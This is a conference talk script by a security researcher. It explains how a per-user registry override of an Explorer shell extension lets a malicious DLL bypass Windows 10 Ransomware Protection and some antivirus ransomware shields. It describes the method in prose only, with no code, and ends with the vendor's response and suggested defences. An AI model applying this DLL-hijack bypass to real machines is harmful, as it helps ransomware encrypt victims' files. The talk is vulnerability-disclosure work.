I’m security researcher @ Fujitsu System Integration Laboratories Limited, and organizer @ B-Sides Tokyo.
I’ve been working for Fujitsu more than 20 years… as Windows software developer. I wrote NDIS drivers, Bluetooth profiles, Winsock applications, and more.
I’ve started security research… about 4 years ago.
My first presentation was @ AV-TOKYO. It’s one of the most famous security conference in Japan, and the motto is “no drink, no hack.”.
So, I gave a presentation while drinking. To be honest, I’d like to do the same today, but I refrain from it.
⏎
This is the history of my research.
3 years ago, I was researching the jump the Air-Gap by Wi-Fi.
I needed administrator privileges… to change the Wi-Fi settings. I replaced the OneDrive’s dll with malicious one, and injected malicious program into Explorer. The program injected itself into another application, and got administrator privileges.
2 years ago, I talked about the method @ B-Sides Las Vegas.
And now, I found the way to evading the Ransomware Protection in Windows 10… using malicious dll.
I’ll explain the contents from now.
⏎
May 12, 2017… Do you remember?
⏎
Yes. It’s the day of cyber-attack by Wanna-Cry.
Wanna-Cry caused tremendous damage… all over the world.
⏎
Microsoft gave one answer against ransomware, such as Wanna-Cry.
It’s literally...
⏎
Ransomware protection!!
This is part of a quote from a Microsoft blog.
Actually, there is more description. I didn’t want to read it, so I examined the actual behavior.
I’ll explain about the behavior of "Ransomware protection", and the minor issues found during the examination.
⏎
This is “Ransomware protection” screen… in Windows Defender Security Center.
Ransomware protection is off by default, and if you turn it on,
⏎
“Protected folders” and
“allow an app through Controlled folder access” are displayed.
We’ll look at each item in detail.
⏎
First, It’s the “Protected folders”.
You can add the folder… that you want to protect.
And this is a list of folders protected by default. Documents, Pictures, Videos, Music, Desktop and Favorites.
Just a moment.
⏎
There is phrase of… “Windows system folders are protected by default” here.
The system folder is usually “c:\windows\system32”.
However, the folder is not included in this list.
⏎
What is the truth?I’ll show you in demonstration from now.
[DEMO 1]
The truth is…
⏎
What is the truth?I’ll show you in demonstration from now.
[DEMO 1]
The truth is…
⏎
Windows system folder is not protected by default.
I think that Microsoft should rewrite… the “Windows system folder” to “user data folder”.
⏎
Next, It’s “Allow an app through Controlled folder access”.
You can add the application… that you want to allow access to “Protected Folder”.
Unlike the previous screen, there is no default list.
Just a moment.
⏎
There is phrase of… “Apps determined by Microsoft as friendly are always allowed“ here.
What application is the friendly? According to previous demonstration, we knew that PowerShell is not covered.
It seems… that not all applications of Microsoft are included in the “friendly”. Then what about third-party applications?
⏎
What is the truth?I’ll show you in demonstration from now.
[DEMO 2]
The truth is…
⏎
What is the truth?I’ll show you in demonstration from now.
[DEMO 1]
The truth is…
⏎
Microsoft only knows.
⏎
This is the mechanism of Ransomware protection.
All applications have access to all folders… by default.
When administrator enables “controlled folder access”,
⏎
Only “allowed apps” can become access “protected folders”, and other apps cannot become access these.
⏎
Administrator can add apps to “allowed apps”,
⏎
and folders to “protected folders”.
⏎
You Ain’t Seen Nothin’ Yet!
Now, I found a vulnerability of “Ransomware protection”.
⏎
This idea is very simple.
⏎
We can probably access the “protected folders”… by injecting malware into the “allowed apps”.
⏎
As I thought there was similar research.
Yago’s idea is using Microsoft Office.
He succeeded in accessing the protected folders… using an OLE object… with embedded malware.
⏎
What is my method?
I’ll show you in demonstration from now.
[DEMO 3]
My method is…
⏎
What is the truth?I’ll show you in demonstration from now.
[DEMO 1]
The truth is…
⏎
Just use a registry.
I will explain the mechanism.
⏎
Needless to say, It’s registry.
There is a shell extension list, loads by Explorer.
This time,
⏎
I used this GUID.
⏎
The actual value of GUID is under HKCR.
It’s shell32.dll.
⏎
About HKCR is written on Windows Dev Center.
Simply speaking, HKCR is that merges HKLM with HKCU, and HKCU takes precedence from HKLM.
You need administrator privileges… to change the value of HKLM, unlike HKCU.
This means… that you can overwrite rewritable values by administrator privileges… with rewritable values by user privileges.
Is this a bug? Wrong. For example, Explorer is assigned as the default application… for decompress zip files.
However, you may want to use a different application like 7zip. There is this registry for its assignment.
This time, I abuse this specification.
⏎
In this case of this GUID, there is a dll information in HKLM, but not in HKCU.
So, if we write another value to HKCU, we can change value of HKCR.
⏎
This is the file encryption process.
Normally, the value in HKLM is reflected in HKCR, Explorer reads it, and loads correct dll.
However, we can write a path of malicious dll in HKCU… with user privileges,
⏎
and its value is reflected in HKCR.
⏎
Explorer reads it, and loads malicious dll.
⏎
As a result,
⏎
the malicious DLL loaded into Explorer, can encrypt the user files.
⏎
We understood about the “Ransomware protection” of Windows 10.
Then, how about others anti-malware application?
⏎
A bit old information, this is a Market share of Windows anti-malware application vendors.
⏎
There are Avast, E-set, Malwarebytes, McAfee, and more.
I checked several anti-malware applications.
⏎
First, It’s Avast Internet Security. It has
⏎
the “Ransomware Shield”. However,
⏎
my malicious dll was able to encrypt the text file… without being protected.
⏎
Next, It’s E-SET Smart security. It has
⏎
the “Ransomware Shield”. However,
⏎
It’s the same result.
⏎
Next, It’s Malwarebytes Premium. It has
⏎
the “Ransomware Protection”. However,
⏎
It’s the same result.
⏎
Next, It’s McAfee Total Protection. It has
⏎
the “Ransomware Interceptor”. However,
⏎
It’s the same result.
⏎
As far as I’ve checked, anti-malware applications cannot protect my ransomware.
Of course, there may be applications that can be protected at this time.
⏎
3 years ago, I submitted a vulnerability report… to the Microsoft Security Response Center… about being able to inject into Explorer… using OneDrive’s problem.
Because I thought it very dangerous vulnerability, and I wanted a little pocket money.
However, MSRC said… they do not have to pay the reward.
⏎
This is revenge.
Unlike the last time, it’s a basic problem of Windows 10 about registry.
The result is…
⏎
As I thought, it was the same answer.
⏎
Because, this does not meet the bar for security servicing.
⏎
I cannot receive reward every time, so I examined the bar for security servicing.
Certainly, this problem does not seem to meet it.
⏎
Moreover,
⏎
It was written… that “Controlled Folder Access” is not covered by the Bug Bounty program.
Cannot help it. I’ll give up on the reward money anymore.
⏎
However, by inject to Explorer,
“Escalate privileges to administrator”, and
“Evading the Ransomware Protection” are an unwavering fact.
Is it okay to leave the problem?
⏎
Therefore, I’d like to suggest the following implementation to Microsoft… as one of the defense-in-depth security features.
First, it’s to load only the signed dll.
This means that prevents the loading of the tampered dll.
The other is to implement the “Controlled dll load” mechanism.
This means that user select the DLL… that the process can load, like “Controlled Folder Access”.
I think that Microsoft needs to take action as soon as possible, as it does anything.
⏎